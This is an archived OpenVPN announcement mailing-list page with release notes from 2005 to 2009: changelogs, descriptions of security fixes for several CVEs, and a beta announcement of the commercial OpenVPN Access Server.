I'm happy to announce the release of OpenVPN 2.1.0. This release is basically 2.1_rc22 + some last-minute trivial fixes to documentation and plugin sample code. Enjoy! James ------------------------------------------------------------------------------ Return on Information: Google Enterprise Search pays you back Get the facts. http://p.sf.net/sfu/google-dev2dev
This release is to respond to the OpenSSL vulnerability CVE-2009-3555. Some people have worried that the fix made to OpenSSL to address this vulnerability (ban all SSL/TLS renegotiations) would break OpenVPN's session renegotiation capability. This is not the case. OpenVPN does not rely on the session renegotiation capability that is built into SSL/TLS, and therefore if OpenVPN is linked against an OpenSSL library that disables SSL/TLS renegotiation, there should be no loss of functionality. Changes: 2009.11.12 -- Version 2.1_rc21 * Rebuilt OpenVPN Windows installer with OpenSSL 0.9.8l to address CVE-2009-3555. Note that OpenVPN has never relied on the session renegotiation capabilities that are built into the SSL/TLS protocol, therefore the fix in OpenSSL 0.9.8l (disable SSL/TLS renegotiation completely) will not adversely affect OpenVPN mid-session SSL/TLS renegotation or any other OpenVPN capabilities. * Added additional session renegotiation hardening. OpenVPN has always required that mid-session renegotiations build up a new SSL/TLS session from scratch. While the client certificate common name is already locked against changes in mid-session TLS renegotiations, we now extend this locking to the auth-user-pass username as well as all certificate content in the full client certificate chain. James ------------------------------------------------------------------------------ Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day trial. Simplify your report design, integration and deployment - and focus on what you do best, core application coding. Discover what's new with Crystal Reports now. http://p.sf.net/sfu/bobj-july
As the founder of the OpenVPN project, I'm proud to announce the first beta release of our new product, the OpenVPN Access Server. With this product, we've taken years of feedback from the OpenVPN community and condensed it into a lightweight but powerful management application that we believe will dramatically simplify the effort required to configure and manage OpenVPN, while still enabling its most powerful features. It's been an interesting voyage for me, having started this project 7 years ago. At that time, "easy-to-use VPN" had a very different meaning that it does today. "easy-to-use" meant that you could get it running without having to recompile your kernel :) Over the years of developing and supporting OpenVPN, I've realized that getting VPNs to work right is hard -- sometimes even harder than writing the actual VPN code. I think the complexity arises from the fact that VPN administration combines 3 different areas of expertise -- (1) Public Key Infrastructure (PKI) and certificate management, (2) IP Networking, including routing and firewall management, and (3) authentication models such as LDAP and RADIUS. To me, there was always a dilemma of sorts in how to address this complexity. Should OpenVPN stay true to the open source ideal of narrow focus and simplicity, where each tool should try to do a single job well, or should OpenVPN take the integrated approach and try to tackle all the issues that make VPNs complex, such as authentication, routing/firewall management, certificate management, etc? The narrow focus ideal makes for a powerful tool, but the need for our community to master PKI, routing, authentication, etc. in order to deploy a real-world VPN solution created a lot of stumbling blocks on the path to enlightenment. My openvpn-users inbox has over 26,500 messages since the project was launched back in 2002 -- it's a great testament to the strength of the community that has grown up around OpenVPN, but also a warning sign as well: many of these messages are calls for help that cite different variations of the same stumbling blocks. So my answer to the dilemma of lean-and-focussed, vs. integrated-and-easy-to-use is this: We will take both paths. On the open source front, we will continue to maintain and extend OpenVPN as a world-class VPN engine. We will be releasing a brand new open source Windows client shortly as a part of the 2.1 release, and we remain committed to maintaining, supporting, and extending OpenVPN as an open source project. On the other hand, we intend to use our commercial arm (OpenVPN Technologies) to really raise the bar on what is possible with VPN technology in general, and especially to take advanced features of OpenVPN such as PKI/certificate-management, LDAP/RADIUS authentication, gateway redirection, automated generation of Windows clients, etc. and make these features easily accessible to anyone who can operate a web browser. So without further fanfare, I invite each of you to test drive the OpenVPN Access Server: http://beta.openvpn.net/index.php/access-server/download-openvpn-as.html Let us know how you like it, what works, and what doesn't work. Our aim is to create a universal VPN management application that covers all the bases. Current features include: * Web-based management with integrated Admin UI. * Fully automated certificate/PKI management. * RADIUS, LDAP, and PAM authentication are all supported. * VPN users can log in via a web interface to download a dynamically generated, plug-and-play Windows installer, or just a client configuration file to use with the OpenVPN client of their choice. * We've developed a new Windows client from scratch that uses the OpenVPN Management interface, and we plan to open source this component for the upcoming OpenVPN 2.1 release. * The Access Server is just a front-end around the standard open source OpenVPN daemon, and all control occurs over the OpenVPN management interface. * The Access Server is compatible with any OpenVPN 2.1 client. * While the Access Server is a commercial product, and not open source, we will be open sourcing components of the product such as the new Windows client, and of course revenue from the product will help to sustain development and support of the OpenVPN core. * The Access Server will be free for up to 2 concurrent connections, and inexpensive licenses will be available for additional concurrent connections (we're looking at pricing of $5/concurrent client which includes 1 year of access to our support center and software updates). Below are the Release Notes for this release. We hope you try out the OpenVPN Access Server v1.1.0 and we look forward to receiving your feedback. Currently, we support the following Linux platforms for the Access Server. We are in the process of expanding this list and will be supporting CentOS shortly: * 64-bit Fedora 8, 9, 10 * 64-bit Ubuntu 8, 9 ------------------------------------------------------------------ OpenVPN Access Server v1.1.0b2 (beta 2) RELEASE NOTES Feedback and Support: -------------------- We appreciate your feedback on this release. Register and login at the Support Center to use the support ticketing system: http://beta.openvpn.net/index.php/access-server/support-center.html New in Access Server v1.1.0: --------------------------- Below are the main enhancements added since the Access Server v1.0.0 release: -- Admin Web UI for configuration and management, including improved configuration options -- Simplified CLI utility (ovpn-init) for initial configuration -- Multi-profile support on Windows Client GUI -- New method of authenticating via LDAP with enhanced configurability Changes Since Access Server v1.1.0b: ----------------------------------- The Access Server v1.1.0b2 contains these improvements since the v1.1.0b release: -- Better interoperation with installed OpenVPN open-source clients (installer no longer removes all TAP interfaces) -- Corrected version numbering of the Windows Client, so that it properly detects an installed OpenVPN-AS v1.0.0 client. -- Fix for an issue occasionally seen on Windows Client GUI where the TAP adapter cannot get an IP address due to a problem in DHCP handshaking between the TAP adapter and the Windows DHCP client. -- Fix for an iptables issue that caused NAT forwarding to fail. Installation: ------------ After installing the OpenVPN-AS package (e.g., using 'yum' on Fedora platforms), run the initialization script: /usr/local/openvpn_as/bin/ovpn-init You will be prompted for initial settings for the Admin Web UI networking and for authenticating the administrator. When ovpn-init completes, it displays the URL to use for logging into the Admin Web UI to continue configuring OpenVPN-AS. License Keys: ------------ You can use the Admin UI after ovpn-init completes. However, to turn on the VPN Server component of OpenVPN-AS, you must have an activated license key. To get started, you can obtain a free, 5-concurrent-user license by registering and logging in at the License Key page: http://beta.openvpn.net/index.php/access-server/license-key.html Enter the license key into the "New License Key" box of the "License" page in the Admin Web UI. Known Issues: ------------ -- Accessing the Client Web Server without an activated license key yields an error message "error communicating with server agent". -- Windows Client status display may remain at "Connecting TCP..." or "Connecting UDP..." when communication with VPN server fails. -- Occasionally, when the Windows Client GUI attempts to connect to the VPN Server for the first time, the connection may stall at the "Connecting" stage and not complete. -- Administrators should ensure that the VPN Server is not configured to run on the same (IP Address:port) combination as the Client Web Server or Admin UI. Currently, the Admin UI does not flag this condition with an error, though it is an invalid configuration. -- The PAM authentication module uses the 'sshd' PAM service, so the /etc/pam.d/sshd file must exist and be properly configured for user authentication. -- The Ubuntu package does not configure the system so that the openvpnas service starts during system startup. Best Regards, James Yonan & the OpenVPN Technologies Team ------------------------------------------------------------------------------ Crystal Reports - New Free Runtime and 30 Day Trial Check out the new simplified licensing option that enables unlimited royalty-free distribution of the report engine for externally facing server and web deployment. http://p.sf.net/sfu/businessobjects
This release fixes a serious (though not security-related) bug in the SSL/TLS negotiation over UDP that can cause SSL/TLS handshake failures. The bug was introduced in 2.1_rc9. All users of OpenVPN 2.1_rc9 and rc10 are urged to upgrade. Change log: 2008.09.14 -- Version 2.1_rc11 * Fixed a bug that can cause SSL/TLS negotiations in UDP mode to fail if UDP packets are dropped. James ------------------------------------------------------------------------- This SF.Net email is sponsored by the Moblin Your Move Developer's challenge Build the coolest Linux based applications with Moblin SDK & win great prizes Grand prize is a trip for two to an Open Source event anywhere in the world http://moblin-contest.org/redirect.php?banner_id=100&url=/
Download: http://openvpn.net/download.html 2008.07.31 -- Version 2.1_rc9 * Security Fix -- affects non-Windows OpenVPN clients running OpenVPN 2.1-beta14 through 2.1-rc8 (OpenVPN 2.0.x clients are NOT vulnerable nor are any versions of the OpenVPN server vulnerable). An OpenVPN client connecting to a malicious or compromised server could potentially receive an "lladdr" or "iproute" configuration directive from the server which could cause arbitrary code execution on the client. A successful attack requires that (a) the client has agreed to allow the server to push configuration directives to it by including "pull" or the macro "client" in its configuration file, (b) the client successfully authenticates the server, (c) the server is malicious or has been compromised and is under the control of the attacker, and (d) the client is running a non-Windows OS. Credit: David Wagner. * Miscellaneous defensive programming changes to multiple areas of the code. In particular, use of the system() call for calling executables such as ifconfig, route, and user-defined scripts has been completely revamped in favor of execve() on unix and CreateProcess() on Windows. * In Windows build, package a statically linked openssl.exe to work around observed instabilities in the dynamic build since the migration to OpenSSL 0.9.8h. James ------------------------------------------------------------------------- This SF.Net email is sponsored by the Moblin Your Move Developer's challenge Build the coolest Linux based applications with Moblin SDK & win great prizes Grand prize is a trip for two to an Open Source event anywhere in the world http://moblin-contest.org/redirect.php?banner_id=100&url=/
OpenSSL 0.9.8c-1 up to 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys. This vulnerability only affects Debian-based distributions and does not affect any Red Hat distributions. http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0166 How this affects OpenVPN: Any keys which were generated on the vulnerable distributions (Debian, Ubuntu, Kubuntu) using openvpn --genkey or the easy-rsa scripts should be considered compromised, since the security of each of these operations would depend on the quality of the randomness provided by the underlying OpenSSL library. You would want to revoke these keys, and rebuild them after having applied the fix. James ------------------------------------------------------------------------- This SF.net email is sponsored by: Microsoft Defy all challenges. Microsoft(R) Visual Studio 2008. http://clk.atdmt.com/MRT/go/vse0120000070mrt/direct/01/
2006.10.01 -- Version 2.0.9 * Windows installer updated with OpenSSL 0.9.7l DLLs to fix published vulnerabilities. * Fixed TAP-Win32 bug that caused BSOD on Windows Vista (Henry Nestler). The TAP-Win32 driver has now been upgraded to version 8.4. 2006.10.01 -- Version 2.1-beta16 * Windows installer updated with OpenSSL 0.9.7l DLLs to fix published vulnerabilities. * Fixed TAP-Win32 bug that caused BSOD on Windows Vista (Henry Nestler). * Autodetect 32/64 bit Windows in installer and install appropriate TAP driver (Mathias Sundman, Hypherion). * Fixed bug in loopback self-test introduced in 2.1-beta15 where self test as invoked by "make check" would not properly exit after 2 minutes (Paul Howarth). James ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys -- and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
2006.09.12 -- Version 2.0.8
* Windows installer updated with OpenSSL 0.9.7k DLLs to fix
RSA Signature Forgery (CVE-2006-4339).
* No changes to OpenVPN source code between 2.0.7 and 2.0.8.
2006.09.12 -- Version 2.1-beta15
* Windows installer updated with OpenSSL 0.9.7k DLLs to fix
RSA Signature Forgery (CVE-2006-4339).
* Fixed bug introduced with the --port-share directive
(back in 2.1-beta9 which causes TLS soft resets
(1 per hour by default) in TCP server mode to force
a blockage of tunnel packets and later time-out and
restart the connection.
* pkcs11 changes:
1. Modified ssl.c to not FATAL and return to init.c
so auth-retry will work.
2. Modifed pkcs11-helper.c to fix some problem with
multiple providers.
3. Updated makefile.w32-vc to include lladdr.*, updated
linkage libraries.
4. Modified lladdr.c to be compiled under visual C.
5. Added retry counter to PKCS#11 PIN hook.
6. Modified PKCS#11 PIN retry loop to return correct error
code when PIN is incorrect.
7. Fix handling (ignoring) zero sized attributes.
8. Fix gcc-2 issues.
9. Fix openssl 0.9.6 (first version) issues.
10. easy-rsa Makefile (install) is now available so that
distribs will be able to install it safely.
* Added two new management states:
OPENVPN_STATE_RESOLVE -- DNS lookup
OPENVPN_STATE_TCP_CONNECT -- Connecting to TCP server
* Echo management state change to log.
* Minor syshead.h change for NetBSD to allow
TCP_NODELAY flag to work.
* Modified --port-share code to remove the assumption that
CMSG_SPACE always evaluates to a constant, to enable
compilation on NetBSD and possibly other BSDs as well.
* Eliminated gcc 3.3.3 warnings on NetBSD
when ./configure --enable-strict is used.
* Added optional minimum-number-of-bytes parameter
to --inactive directive.
James
-------------------------------------------------------------------------
Using Tomcat but need to do more? Need to support web services, security?
Get stuff done quickly with pre-integrated technology to make your job easier
Download IBM WebSphere Application Server v.1.0.1 based on Apache Geronimo
http://sel.as-us.falkag.net/sel?cmd=lnk&kid=120709&bid=263057&dat=121642
* Code added in 2.1-beta7 and 2.0.6-rc1 to extend byte counters to 64 bits caused a bug in the Windows version which has now been fixed. The bug could cause intermittent crashes. James ------------------------------------------------------- This SF.Net email is sponsored by xPML, a groundbreaking scripting language that extends applications into web and mobile media. Attend the live webcast and join the prime developer group breaking into this new coding territory! http://sel.as-us.falkag.net/sel?cmd=lnk&kid=110944&bid=241720&dat=121642
This release contains fixes for two security issues that just came to my attention over the past 24 hours, which affect OpenVPN 2.0, 2.0.1, 2.0.2, and the 2.1 beta series. OpenVPN 1.x is not affected. Individual patches are available here: http://openvpn.net/patch/2.0.4-security-patches Change Log: * Security fix -- Affects non-Windows OpenVPN clients of version 2.0 or higher which connect to a malicious or compromised server. A format string vulnerability in the foreign_option function in options.c could potentially allow a malicious or compromised server to execute arbitrary code on the client. Only non-Windows clients are affected. The vulnerability only exists if (a) the client's TLS negotiation with the server succeeds, (b) the server is malicious or has been compromised such that it is configured to push a maliciously crafted options string to the client, and (c) the client indicates its willingness to accept pushed options from the server by having "pull" or "client" in its configuration file (Credit: Vade79). CVE-2005-3393 * Security fix -- Potential DoS vulnerability on the server in TCP mode. If the TCP server accept() call returns an error status, the resulting exception handler may attempt to indirect through a NULL pointer, causing a segfault. Affects all OpenVPN 2.0 versions. CVE-2005-3409 * Fix attempt of assertion at multi.c:1586 (note that this precise line number will vary across different versions of OpenVPN). * Added ".PHONY: plugin" to Makefile.am to work around "make dist" issue. * Fixed double fork issue that occurs when --management-hold is used. * Moved TUN/TAP read/write log messages from --verb 8 to 6. * Warn when multiple clients having the same common name or username usurp each other when --duplicate-cn is not used. * Modified Windows and Linux versions of get_default_gateway to return the route with the smallest metric if multiple 0.0.0.0/0.0.0.0 entries are present. James ------------------------------------------------------- SF.Net email is sponsored by: Tame your development challenges with Apache's Geronimo App Server. Download it for free - -and be entered to win a 42" plasma tv or your very own Sony(tm)PSP. Click here to play: http://sourceforge.net/geronimo.php
Download: http://openvpn.net/download.html Changes since 2.0.1: * Fixed regression bug in Win32 installer, introduced in 2.0.1, which incorrectly set OpenVPN service to autostart. * Don't package source code zip file in Windows installer in order to reduce the size of the installer. The source zip file can always be downloaded separately if needed. * Fixed bug in route.c in FreeBSD, Darwin, OpenBSD and NetBSD version of get_default_gateway. Allocated socket for route manipulation is never freed so number of mbufs continuously grow and exhaust system resources after a while (Jaroslav Klaus). * Fixed bug where "--proto tcp-server --mode p2p --management host port" would cause the management port to not respond until the OpenVPN peer connects. * Modified pkitool script to be /bin/sh compatible (Johnny Lam). James ------------------------------------------------------- SF.Net email is Sponsored by the Better Software Conference & EXPO September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA Security * Process Improvement & Measurement * http://www.sqe.com/bsce5sf
 |
|
|
|
|
|
|
| Mon | Tue | Wed | Thu | Fri | Sat | Sun |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
RSS Feed1 | |
|---|---|
1 | |
1 | |
1 | |
1 | |
1 | |
1 | |
1 | |
2 | |
1 | |
1 | |
2 | |
1 | |
1 | |
1 | |
2 | |
1 | |
1 | |
2 | |
3 |